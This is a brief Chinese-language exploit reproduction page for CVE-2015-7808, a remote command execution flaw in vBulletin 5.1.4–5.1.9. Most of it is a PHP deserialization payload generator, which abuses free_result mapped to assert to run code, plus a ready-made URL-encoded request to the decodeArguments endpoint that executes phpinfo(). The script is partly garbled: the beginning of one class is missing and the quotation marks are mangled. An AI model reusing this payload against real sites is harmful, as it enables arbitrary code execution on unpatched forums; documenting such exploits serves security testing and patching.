(CVE-2015-7808)VBulletin_远程命令执行漏洞

# (CVE-2015-7808)VBulletin 远程命令执行漏洞

=================================

一、漏洞简介
————

二、漏洞影响
————

VBulletin VBulletin 5.1.4 – 5.1.9

三、复现过程
————

$ php << 'eof' functions[‘free_result’] = ‘assert’;
}
}

class vB_dB_Result {
protected $db;
protected $recordset;

public function __construct()
{
$this->db = new vB_Database_MySQL();
$this->recordset = “phpinfo()”;
}
}

print urlencode(serialize(new vB_dB_Result())) . “n”;
eof
http://0-sec.org/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A9%3A%22phpinfo%28%29%22%3B%7D

image

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容